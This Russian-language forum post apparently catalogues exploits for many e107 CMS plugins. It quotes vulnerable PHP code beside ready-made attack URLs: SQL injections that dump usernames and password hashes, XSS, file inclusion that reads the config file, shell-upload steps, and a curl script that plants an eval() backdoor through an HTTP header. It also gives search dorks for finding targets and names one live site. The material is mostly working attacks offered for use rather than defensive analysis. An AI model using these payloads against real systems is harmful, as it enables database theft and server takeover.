| }{оттабыч |
11.12.2010 01:11 |
Sport league v0.75 для e107
[скачать]
SQL inj
e107_plugins/sport_league_e107/profil.php
PHP код:
/*...*/
require_once("../../class2.php");
require_once(HEADERF);
$lan_file = e_PLUGIN."sport_league_e107/languages/".e_LANGUAGE."/league_roster_lan.php";
require_once(file_exists($lan_file) ? $lan_file : e_PLUGIN."sport_league_e107/languages/German/league_roster_lan.php");
require_once("".e_PLUGIN."sport_league_e107/functionen.php");
// ============= START OF THE BODY ====================================
$qry1="
SELECT a.*, ae.* FROM ".MPREFIX."league_roster AS a
LEFT JOIN ".MPREFIX."league_players AS ae ON ae.players_id=a.roster_player_id
WHERE a.roster_id =".$_GET['player_id']."
";
$sql->db_Select_gen($qry1);
while($row = $sql-> db_Fetch())
{
$player[0]=$row['roster_id'];
$player[2]=$row['roster_saison_id'];
/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/sport_league_e107/profil.php?player_id=1 and 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,user_loginname,user_password) from e107_user limit 0,1--
скрин
WAP-версия сайта на e107 CMS
http://blog.svetoch.biz/download/2/
pXSS
wap.php в корене.
PHP код:
$mode = $_GET["mode"];
if($mode <> "html"){
header("Content-type: text/vnd.wap.wml");
echo "<?xml version=\"1.0\"?>";
echo "<!DOCTYPE wml PUBLIC \"-//WAPFORUM//DTD WML 1.1//EN\""
. " \"http://www.wapforum.org/DTD/wml_1.1.xml\">";
/*...*/
lseif($section == "comments"){
$cid = $_GET["cid"];
if($cid){
$caption.= "Комментарии $cid";
/*...*/
PoC:
Код:
http://[host]/[path]/wap.php?section=comments&cid=%3Cscript%3Ealert(123)%3C/script%3E&mode=html
e107 BLOG Engine - v2.0.3
Автор MacGuru. Перевел и разместил ReckouNT
[скачать]
SQL inj
e107_plugins/macgurublog_menu/macgurublog.php
PHP код:
/*...*/
$buid = $_GET['uid'];
$gpf = $_GET['gpf'];
if (!isset($buid)) {
//list
require(e_PLUGIN."macgurublog_menu/macgurublog_menu.php");
} else {
//the users blog
$sql -> db_Select("macgurublog_main", "*", "blog_uid=".$buid);
$row = $sql-> db_Fetch();
/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/macgurublog_menu/macgurublog.php?uid=1%20and%200%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3%20from%20e107_user
скрин
AACGC Game List v.3.2
скачать с plugins.e107.org
inurl:/e107_plugins/aacgc_gamelist
SQL inj
Нужно быть авторизированным.
e107_plugins/aacgc_gamelist/AddMe.php
Код:
/*...*/
if (e_QUERY) {
$tmp = explode('.', e_QUERY);
$action = $tmp[0];
$sub_action = $tmp[1];
$id = $tmp[2];
unset($tmp);
}
$sql->db_Select("aacgc_gamelist", "*", "WHERE game_id = $sub_action","");
$row = $sql->db_Fetch();
/*...*/
<td colspan=2>
<i>Are You Sure You Want To Be Added To The <b>".$row['game_name']."<b> List?</i>
</td>
/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/aacgc_gamelist/AddMe.php?0.1%20and%200%20union%20select%201,%28SELECT%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%20%29,3,4,5,6,7,8,9,10,11,12
Path Disclosure
display_errors = On
PoC:
Код:
http://[host]/[path]/e107_plugins/aacgc_gamelist/search.php
http://[host]/[path]/e107_plugins/aacgc_gamelist/Game_Cat_List_menu.php
http://[host]/[path]/e107_plugins/aacgc_gamelist/Game_List_menu.php
http://[host]/[path]/e107_plugins/aacgc_gamelist/Game_Showcase_menu.php
http://[host]/[path]/e107_plugins/aacgc_gamelist/Game_User_List_menu.php
LFI
magic_quotes_gpc = Off
[скачать]
/tiny_mce/plugins/imanager/langs/lang.class.php
PHP код:
/*...*/
function PLUG_Lang( $lang = '' ) {
global $cfg;
if ( $lang == '' ) {
$this -> lang = $cfg['lang'];
} else {
$this -> lang = $lang;
}
$this -> loadData();
}
// load language data
function loadData() {
global $cfg;
include( dirname(__FILE__) . '/' . $this -> lang.'.php' );
$this -> charset = $lang_charset;
/*...*/
tiny_mce/plugins/imanager
PHP код:
/*...*/
include dirname(__FILE__) . '/langs/lang.class.php';
//-------------------------------------------------------------------------
// language settings
$l = (isset($_REQUEST['lang']) ? new PLUG_Lang($_REQUEST['lang']) : new PLUG_Lang($cfg['lang']));
/*...*/
PoC
Код:
http://[host]/[path]/tiny_mce/plugins/imanager/imanager.php?lang=../../../../../favicon.ico%00
pXSS
tiny_mce/plugins/imanager/scripts/popup.php
PHP код:
if ( get_magic_quotes_gpc() ) {
$_GET['url'] = stripslashes($_GET['url']);
}
$src = @$_REQUEST['url'];
$clTxt = (isset($_REQUEST['clTxt']) ? $_REQUEST['clTxt'] : $cfg['clTxt']);
/*...*/
<img onclick="window.close();" src="<?php echo $src; ?>" border="0" alt="<?php echo $clTxt; ?>" title="<?php echo $clTxt; ?>" style="cursor: pointer;"/></div>
PoC:
Код:
http://[host]/[path]//tiny_mce/plugins/imanager/scripts/popup.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
pXSS
скачать 0.7.24
Cтандартный tiny_mce. Проверил на самом последнем релизе 0.7.24.
/e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php
PHP код:
/*...*/
<form id=\"libbrowser\" method=\"post\" action=\"ibrowser.php?request_uri=".$_GET['request_uri']."\" enctype=\"multipart/form-data\" target=\"imglibrary\">
/*...*/
PoC:
Код:
http://[host]/[path]/e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php?request_uri=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
Дорк:
intext:"This site is powered by e107"
Скажу по секрету что автора плагинов ~M@CH!N3~ для этой CMS я просто люблю :)
AACGC Public News
06:54 03-Dec-10
[скачать]
Будущий дорк:
inurl:e107_plugins/aacgc_pnews
SQLinj
e107_plugins/aacgc_pnews/News.php
PHP код:
/*...*/
if (e_QUERY) {
$tmp = explode('.', e_QUERY);
$action = $tmp[0];
$sub_action = $tmp[1];
$id = $tmp[2];
unset($tmp);
}
/*...*/
$sql ->db_Select("aacgc_pnews_cat", "*", "WHERE news_cat_id = ".$sub_action."","");
$row = $sql ->db_Fetch();
$newscatid = $row['news_cat_id'];
$newscattitle = $row['news_cat_title'];
$newscatdesc = $row['news_cat_desc'];
$text .= "<tr>
<td colspan='2' style='width:100%' class='".$themea."'><center>
<a href='".e_PLUGIN."aacgc_pnews/News.php?det.".$newscatid."'><font size='".$pref['pnews_news_catfsize']."'><b>".$newscattitle."</b></font></a><br>".$newscatdesc."
</center></td></tr>";
/*...*/
$title .= "Public News"; // <- в начале
$ns -> tablerender($title, $text);
/*...*/
class2.php
PHP код:
/*...*/
if (!class_exists('e107table'))
{
class e107table
{
function tablerender($caption, $text, $mode = "default", $return = false) {
/*
# Render style table
# - parameter #1: string $caption, caption text
# - parameter #2: string $text, body text
# - return null
# - scope public
*/
global $override;
if ($override_tablerender = $override->override_check('tablerender')) {
$result=call_user_func($override_tablerender, $caption, $text, $mode, $return);
if ($result == "return") {
return;
}
extract($result);
}
if ($return) {
ob_start();
tablestyle($caption, $text, $mode);
$ret=ob_get_contents();
ob_end_clean();
return $ret;
} else {
tablestyle($caption, $text, $mode);
}
}
}
}
/*...*/
$ns=new e107table;
/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/aacgc_pnews/News.php?1.2 and 0%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3%20from%20e107_user%20limit%200,1
скрин
SQLinj
Код:
http://[host]/[path]/e107_plugins/aacgc_pnews/News_Details.php?1.2%20and%200%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3,4,5,6,7,8%20from%20e107_user%20limit%200,1
PS
1. В News.php по коду далее 2-d order намечаеться.
2. В других скриптах видел иньекции, но нехочеться смотреть(
Hupsis Media Gallery
[скачать]]
pXSS
/e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/ajaxfilemanager.php
PHP код:
/*...*/
var queryString = '<?php echo makeQueryString(array('path')); ?>';
/*...*/
e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/inc/config.php
PHP код:
/*...*/
require_once(DIR_AJAX_INC . "function.base.php");
/*...*/
e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/inc/function.base.php
PHP код:
/*...*/
function makeQueryString($excluded=array())
{
$output = '';
$count = 1;
foreach($_GET as $k=>$v)
{
if(array_search($k, $excluded) === false)
{
$output .= ($count>1?'&':'') . ($k . "=" . $v);
$count++;
}
}
return $output;
}
/*...*/
Код:
http://[host]/[path]/e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/ajaxfilemanager.php?%3Cscript%3Ealert%28123%29%3C/script%3E
Заливка кода в текстовый файл:
Код:
<form name="" action="http://[host]/[path]/e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/ajax_save_text.php" method="post">
<input name="folder" type="text" value="../../content">
<input name="name" type="text" value="1.php.txt">
<input name="save_as_request" type="text" value="1">
<input name="text" type="text" value="<?php echo '<?php phpinfo() ?>' ?>">
<input type="submit" value="test">
</form>
Код:
http://[host]/[path]/e107_plugins/hupsis_media_gallery/content/1.php.txt
Код не привожу, но считаю нужно реализацию!
Какие лились у меня:
PHP код:
define('CONFIG_EDITABLE_VALID_EXTS', 'txt,htm,html,xml,js,css')
AACGC Wish List
Author
~M@CH!N3~
Date
22:03 05-Dec-10
[скачать]
SQL inj
/e107_plugins/aacgc_wishlist/Wish_List_Details.php
PHP код:
/*...*/
if (e_QUERY) {
$tmp = explode('.', e_QUERY);
$action = $tmp[0];
$sub_action = $tmp[1];
$id = $tmp[2];
unset($tmp);
/*...*/
if ($action == "det"){
$sql->db_Select("aacgc_wishlist", "*", "WHERE list_user_id=$sub_action","");
$row = $sql->db_Fetch();
/*...*/
$text .= "
<tr>
<td class='".$themea."' colspan=3><center>".$avatar." ".$userorb."</td></tr>
<td class='".$themeb."'>".$listtype."</td>
<td class='".$themeb."'>End Date:<br>[".$row['list_date']."]</td>
<td class='".$themeb."'>".$pageviews."</td>
</tr>";
/*...*/
В других файлах есть иньекции.
PoC:
Код:
http://[host]/[path]/e107_plugins/aacgc_wishlist/Wish_List_Details.php?det.2%20and%200%20union%20select%201,2,3,4,concat_ws%280x3a,user_loginname,user_password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20e107_user%20limit%200,1
скрин
e107 Newsletter v3.30 by addy
скачать
SQL inj
magic_quotes_gpc = Off
e107_plugins/e107newsletter
PHP код:
/*...*/
switch ($_GET['caseid']) {
// ############################################################################################
// ############# TRACK THE CLICK THROUGH AND FORWARD TO REDIRECT URL ###################
// ############################################################################################
case 'trackit':
$codes = explode(".", $_GET['code']);
$archive_id = $codes[0];
$memberid = $codes[1];
$newsid = $codes[2];
$check = $codes[3];
// check result code
if ($check == ($archive_id + 10) + $memberid + 2 * $newsid) {
if ($sql2->db_Select("newsletters", "newsletter_redirect_url", "newsletter_id = '" . $newsid . "'", "default")) {
// if archived newsletter still exists than get redirect_url and update counters etc.
$row = $sql2->db_Fetch();
extract($row);
// get member details
$sql2->db_Select("newsletter_member", "members_email,members_E107_user_id", "members_id = '" . $memberid . "'", "default");
$row = $sql2->db_Fetch();
extract($row);
// handle E107 members
if ($members_E107_user_id > 0) {
if ($sql2->db_Select("user", "user_id, user_email", "user_id = '" . $members_E107_user_id . "'", "default")) {
$row = $sql2->db_Fetch();
extract($row);
$members_email = $user_email;
}
}
$time_actual = time();
$sql2->db_Insert("newsletter_tracking (tracking_send, tracking_email, tracking_timestamp)", "'" . $archive_id . "', '" . $members_email . "', '" . $time_actual . "'");
echo "<meta http-equiv=refresh content='0;URL=" . $newsletter_redirect_url . "'>";
exit;
} else {
// else jump to site main page
js_location(e_BASE . "index.php");
/*...*/
Интересная проверка в файле :)
PHP код:
/*...*/if ($check == ($archive_id + 10) + $memberid + 2 * $newsid) {/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/e107newsletter/track_newsletter.php?caseid=trackit&code=1.2.3%27%20and%200%20union%20select%20concat_ws%28%27:%27,user_loginname,user_password%29%20from%20e107_user--%20.19
Оключаем редирект и смотрим свободно в теге.
Цитата:
<meta http-equiv=refresh content='0;URL=admin:21232f297a57a5a743894a0e4a801 fc3'>
|
RPS for Gold System v1.1 by Spyro
скачать
SQL inj + FPD
magic_quotes_gpc = Off
e107_plugins/knp/knp.php
PHP код:
/*...*/
if(isset($_GET['mode'])){
$isd = $_GET['i'];
$p_hrac1 = $_GET['g'];
$p_symbol2 = $_GET['s'];
$sql -> db_Select("knp", "*", "ix ='$isd'");
while($row = $sql-> db_Fetch()){ // start loop
//Début de la boucle
$hcastka = "".$row['castka']."";
$h_symbol1 = "".$row['symbol']."";
$h_id = "".$row['id']."";
$g_name ="".$row['hname']."";
}
//---Remíza - Kámen-=====================================================================================================================
if($h_symbol1 == 1 && $p_symbol2 == 1){$text ="
<table border='0' width='100%' class='forumheader3'>
<tr>
<td width='100%'>
<p align='center'>".LAN_KNP_23." <b>".LAN_KNP_24."</b>. ".LAN_KNP_25." <a href='../../user.php?id.$h_id'>$g_name</a> ".LAN_KNP_26." <img src='images/1.gif' border='0'>.<br>
</td>
</tr>
</table>
";
//---odeslani zpravy---
if($pm == 1){
/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/knp/knp.php?i=1%27%20and%200%20union%20select%201,2,version%28%29,4,1--%20&mode=1&s=1
скрин
IRDJ Schedule v1.2 by martinj
скачать
SQL inj
magic_quotes_gpc = Off
e107_plugins/irdj/profile.php
PHP код:
/*...*/
$view_profile=$_GET['id'];
$work=mysql_query("SELECT * FROM ".$mySQLprefix."irdjprofile_admin WHERE id='$view_profile'");
if (!mysql_affected_rows())
die ("Error - Profile not found!");
$row=mysql_fetch_array($work);
/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/irdj/profile.php?id=1%27%20and%200%20union%20select%201,2,version%28%29,4,5,6,7,8,9,10%23
roll_mini
скачать
SQL inj
magic_quotes_gpc = Off
e107_plugins/roll_mini/roll.php
PHP код:
/*...*/
if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1";
/*...*/
$mydb->db_Select("roll_mini_cat", "*", "id = '$id_cat' order by id");
while($row = $mydb->db_Fetch()) {
$caption = $row['name'];
}
/*...*/
PoC:
Код:
http://pub-tower.ru/e107_plugins/roll_mini/roll.php?cat=1%27%20and%200%20union%20select%201,2,concat_ws%28%22%27%22,user_loginname,user_password%29,4,5,6%20from%20e107_user%20limit%200,1--%20&card_id=109
e Card
скачать
SQL inj
magic_quotes_gpc = Off
e107_plugins/ecards_menu/getmusic.php
PHP код:
/*...*/
$music=$_GET['music'];
/*...*/
if ($music)
{
$sql->db_Select("card_music", "*", "where mpath='$music'", "nowhere", false);
$ecard_mrow = $sql->db_Fetch();
echo"
<table width='100%'>
<tr>
<td class='forumheader2'>".$ecard_mrow['mname']."
<embed src=\"sound/".$ecard_mrow['mpath']."\"
width=\"00\" height=\"00\"
autostart=\"true\"
name=\"mysound\"
enablejavascript=\"true\"/>
</td>
</tr>
</table>";
}
/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/ecards_menu/getmusic.php?music=1%27%20and%200%20union%20select%201,concat_ws%28%27:%27,user_loginname,user_password%29,3%20from%20e107_user%23
SQL inj
magic_quotes_gpc = Off
PoC:
Код:
http://[host]/[path]/e107_plugins/ecards_menu/getpoem.php?poem_id=1%27%20and%200%20union%20select%201,2,concat_ws%28%27:%27,user_loginname,user_password%29,4,5%20from%20e107_user%23
Alternate_profiles v0.5
скачать
SQLinj
Условия:
авторизироваться под рядовым и усе.
e107_plugins/alternate_profiles/newuser.php
PHP код:
/*...*/
if ($pref['profile_allowguests'] == 'No' or $pref['profile_allowguests'] == '') {
if (!USER) {
$ns->tablerender("Error",PROFILE_2);
require_once(FOOTERF);
exit;
}
}
if (isset($_GET['id'])) {
$id = $_GET['id'];
$sql -> db_Select("user", "*", "user_id=".$id."");
$user = $sql -> db_Fetch();
/*...*/
Poc:
Код:
http://[host]/[path]/e107_plugins/alternate_profiles/newuser.php?id=1%20and%200%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws%280x3a,user_loginname,user_password%29,25,26,27,28,29,30,31%20from%20e107_user%20limit%200,1--
скрин
Грузим шелл
условия: нужно авторизироваться рядовым.
Код:
http://[host]/[path]/alternate_profiles/newusersettings.php?page=images&uploaded =>
кнопка обзор =>
кнопка upload =>
наш шелл http://[host]/[path]/e107_plugins/alternate_profiles/userimages/2/shellname.php
PHP код:
$dir = "userimages/".USERID."/";
USERID => user_id в [prefix]_user, на каталог .htaccess нет.
my_gallery v2.3
скачать
Читалка файлов
e107_plugins/my_gallery/dload.php
PHP код:
<?php
$file = $_GET['file'];
$date_txt = date("y-m-d_H-i-s");
$text = "Content-Disposition: attachment; filename=".$_SERVER["SERVER_NAME"]."_e107_my_gallery_".$date_txt.".jpg";
header('Content-type: image/jpeg');
header($text);
readfile($file);
?>
PoC:
Код:
http://[host]/[path]/e107_plugins/my_gallery/dload.php?file=../../e107_config.php
LFI
magic_quotes_gpc = Off
e107_plugins/my_gallery/my_gallery.php
PHP код:
$m_position = $pref['mygallery_memo_show']; // по умолчанию не равно 0 :)
/*...*/
if ($_GET['gallery']) $gallery = $_GET['gallery'];
if ($_GET['page']) $page = $_GET['page'];
/*...*/
if ($m_position != "0") {
if (file_exists("$gallery/index.php")) {
include_once("$gallery/index.php");
}
}
/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/my_gallery/my_gallery.php?gallery=../../favicon.ico%00
зы
ftp:// пускает.
/class2.php
PHP код:
/*...*/
// Filter common bad agents / queries.
if(strpos($_SERVER['QUERY_STRING'],"=http")!==FALSE || strpos($_SERVER["HTTP_USER_AGENT"],"libwww-perl")!==FALSE)
{
exit();
}
/*...*/
Ну тогда RFI
Участок кода такой же:
PHP код:
if ($m_position != "0") {
if (file_exists("$gallery/index.php")) {
include_once("$gallery/index.php");
}
}
PoC:
Код:
http://[host]/[path]/e107_plugins/my_gallery/my_gallery.php?gallery=ftp://name:pass@XXX.XXX.XXX.XXX:port/file.txt?
Notice-Board v2 beta
скачать
SQLinj
e107_plugins/nboard/doadd.php
PHP код:
<?php
/*============================= Notice-Board v2.0 ======================================|
| author - ComPolyS, http://e107.compolys.ru, e107@compolys.ru |
| coder - Sunout, sunout@compolys.ru |
=================================== december 2010 =====================================*/
header('Content-Type: text/xml');
require_once("../../class2.php");
//if(!getperms("P")){header("location:".e_BASE."index.php"); exit; }
require_once(e_HANDLER."form_handler.php");
require_once(e_HANDLER."userclass_class.php");
$cat_id = $_GET['id'];
mysql_query('SET NAMES cp1251');
mysql_query ("set character_set_results='utf8'");
$dom = new DOMDocument();
$response = $dom -> createElement('response');
$dom -> appendChild($response);
$books = $dom -> createElement('books');
$response -> appendChild($books);
$sql -> db_Select("nb_cat", "*", "cat_sub_id=$cat_id");
while($row = $sql -> db_Fetch()){
$cat_id = $row['cat_id'];
$cat_name = $row['cat_name'];
$book = $dom -> createElement('book');
$title = $dom -> createElement('title');
$titleText = $dom -> createTextNode($cat_id);
$title -> appendChild($titleText);
$isbn = $dom -> createElement('isbn');
$isbnText = $dom -> createTextNode($cat_name);
$isbn -> appendChild($isbnText);
$book -> appendChild($title);
$book -> appendChild($isbn);
$books -> appendChild($book);
}
$xmlString = $dom -> saveXML();
echo $xmlString;
?>
PoC:
Код:
http://[host]/[path]/nboard/doadd.php?id=1%20and%200%20union%20select%201,2,version%28%29,4
скрин
e107_quiz v0.9.1
скачать
SQL inj
Условия:
Нужно быть авторизированым.
Magic_quotes_gpc = Off
e107_plugins/e107_quiz/chkanswears.php
PHP код:
/*...*/
$conn = @mysql_connect($mySQLserver,$mySQLuser,$mySQLpassword);
if ($conn==FALSE) {
die("<br />ERROR: cannot connect to database<br />" );
}
$array = $_POST;
$idto = (INT)$_POST['testid'];
if (isset($_POST['questionlist']))
{
$questinlist = $_POST['questionlist'];
}
if (empty($_POST['questionlist']))
{
print e107_quiz_USER_L9;
}
$brcorans = 0; //broi verni otgovori.
$brwrans = 0; //broi gre6ni otgovori.
$arrcorans = ""; //spisak na vernite vaprosi.
$arrwrans = ""; //spisak na gre6nit
/*...*/
function checkanswears($conn, &$test, &$brcorans, &$brwrans, &$arrcorans, &$arrwrans)
{
$questbr = 1;
if(is_array($_POST))
{
$size = count($_POST);
if($size)
{
for($i=0; $i < $size; $i++)
{
list($key, $value) = each($_POST); //simulirane na foreach
if($key == "testid"){continue;}
if($key == "chkanwers"){
break;
}
list($qtype, $rest) = explode("_", $key);
if ($qtype == "qnr")
{
list($questid , $userans) = explode("-", $value);
$query = "SELECT tq_corans FROM ".MPREFIX."test_questions WHERE tq_id = '$questid'";
echo $query;
$result = mysql_query($query , $conn) or die ('Error, cant not get right answear: ' . mysql_error());
$myrow = mysql_fetch_array($result);
/*...*/
if(USER)
{
$test = "";
checkanswears($conn, $test, $brcorans, $brwrans, $arrcorans, $arrwrans);
$arrtest = explode(" : ", $test);
$arrtestbr = count($arrtest);
$i =0;
$text .= "<table class='maintable' style=\"width:100%\" border=\"1\">
<tr>
<td class='forumheader' style='vertical-align:top' width=\"10px\"><b>".e107_quiz_CONFIG_L58."</b></td>
<td class='forumheader' style='vertical-align:top' width=\"30%\"><b>".e107_quiz_CONFIG_L61."</b></td>";
$query = "SELECT tt_ans FROM ".MPREFIX."test_tests WHERE tt_id = '$idto'";
$secvesult = mysql_query($query , $conn) or die ('Error, cannot get questions: ' . mysql_error());
$secvmyrow = mysql_fetch_array($secvesult);
/*...*/
PoC:
Код:
<form action="http://[host]/[path]/e107_plugins/e107_quiz/chkanswears.php" method="post">
<input name="qnr_bla" type="text" value="1' and (select * from(select name_const(version(),1),name_const(version(),1))a) and '1">
<input type="submit" value="Send">
</form>
скрин
2asys v0.1
скачать
SQL inj
e107_plugins/2asys_menu/inform.php
PHP код:
/*...*/
if (e_QUERY) {
$tmp = explode('.', e_QUERY);
$action = $tmp[0];
$id = $tmp[1];
$subid = $tmp[2];
unset($tmp);
}
/*...*/
if ($action == "show") {
$sql->db_Select("asasys_users", "asasys_userid, asasys_nick, asasys_info, asasys_statlink, asasys_stattype, asasys_oldstat, asasys_newstat, asasys_nags, asasys_naglogs, asasys_zvanie, asasys_rank", "asasys_id = ".$id);
$row = $sql->db_Fetch();
$flauploads = uploadings(nagsoptimazer($row['asasys_nags']));
$text .= "<br><br><div style='text-align:left;font-size: 12px;font-weight: bold;'>Информация ".$row['asasys_nick']."</div><br>";
$text .= "<div style='text-align:left'><table class='fborder' style='width:95%' align='center'><tr><td class='forumheader3'><b>Награды</b></td></tr><tr><td class='forumheader3' height='400' style='text-align:center'>
<object classid='CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000' width='500' height='400'
codebase='http://active.macromedia.com/flash2/cabs/swflash.cab#version=4,0,0,0'>
<param name='movie' value='2asys.swf'>
<param name='quality' value='high'>
<param name='flashvars' value='nags=".$flauploads."&zvan=".$row['asasys_zvanie']."'>
<embed src='2asys.swf' quality='high' width='500' height='400' swLiveConnect='false'
type='application/x-shockwave-flash'
pluginspage='http://www.macromedia.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash'>
</embed>
</object>
</td></tr></table></div>";
$text .= "<div style='text-align:left'><table class='fborder' style='width:95%' align='center'><tr><td class='forumheader3'><b>Последнее награждение</b></td></tr><tr><td class='forumheader3'>";
$lognags = explode("/", $row['asasys_naglogs']);
/*...*/
PoC:
Код:
http://[host]/[path]/e107_0.7.24_full/e107_plugins/2asys_menu/inform.php?show.1%20and%200%20union%20select%201,2,concat_ws%280x3a,user_loginname,user_password%29,4,5,6,7,8,9,10,11%20from%20e107_user
скрин
Citatio v0.2
[скачать]
SQL inj
e107_plugins/citatio/citatio.php
PHP код:
/*...*/
if (e_QUERY) {
list($from, $order, $option, $action) = explode(".", e_QUERY);
$from = intval($from);
$order = urldecode($order);
unset($tmp);
}
$from = ($from ? $from : 0);
$option = ($option ? $option : "mod");
$order = ($order ? $order : "0");
/*...*/
$text .= "<table class='fborder'><tbody>";
$query = "citatio_".$option." REGEXP('".$order."') AND citatio_mod = 0";
if(!$sql -> db_Select("citatio", "*", $query." ORDER BY citatio_id DESC LIMIT ".$from.", ".$pref['citatio_amount'])) {
$text .= "<tr><td>".LAN_CIT_20."</td></tr>";
}else {
if($action == "authors") {//authors list
$text .= "<tr><td class='forumheader3'>";
while($row = $sql -> db_Fetch()) {
extract($row);
if ($citatio_author != $_citatio_author) {
$_citatio_author = $citatio_author;
$text .= "<a href='".e_SELF."?0.".$citatio_author.".author'>".$citatio_author.",</a> ";
}
}
$text .= "</td></tr>";
/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/citatio/citatio.php?1.2.id=1%20and%200%20union%20select%201,2,user_loginname,user_password,5,6%20from%20e107_user%20limit%200,1--
скрин
Вы нашли LFI, но незнаете что проинклудить, вы злые, а на сервере крутиться CMS e107?
Не вопрос!
Разработчики оставили для вас выполнение искодного кода php после перенаправления, если нет заглушки, в дефолтном плагине.
/e107_plugins/gsitemap/admin_config.php
PHP код:
/*...*/
require_once("../../class2.php");
if(!getperms("P")){ header("location:".e_BASE."index.php"); }
require_once(e_ADMIN."auth.php");
require_once(e_HANDLER."userclass_class.php");
include_lan(e_PLUGIN."gsitemap/languages/gsitemap_".e_LANGUAGE.".php");
$gsm = new gsitemap;
/*...*/
footer.php с админки.
PHP код:
/*...*/
require_once(e_ADMIN."footer.php");
/*...*/
/e107_admin/footer.php
PHP код:
/*...*/
if (isset($_SERVER['HTTP_IF_NONE_MATCH']))
{
$IF_NONE_MATCH = str_replace('"','',$_SERVER['HTTP_IF_NONE_MATCH']);
$data = "IF_NON_MATCH = ".$IF_NONE_MATCH;
$data .= "\nEtag = ".$etag;
file_put_contents(e_ADMIN."etag_log.txt",$data);
/*...*/
Запускаем скрипт и усе. ;)
PHP код:
<?
$hostname = 'host/path';
$ch = curl_init('http://'.$hostname.'/e107_plugins/gsitemap/admin_config.php');
curl_setopt ($ch, CURLOPT_HEADER, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3');
curl_setopt ($ch, CURLOPT_REFERER, 'https://'.$hostname.'/index.php');
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch,CURLOPT_HTTPHEADER,array('IF_NONE_MATCH: <?php eval($_REQUEST[ev]) ?>'));
curl_exec ($ch);
curl_close ($ch);
?>
Наш евал-код за адресом http://[host]/[path]/e107_admin/etag_log.txt |
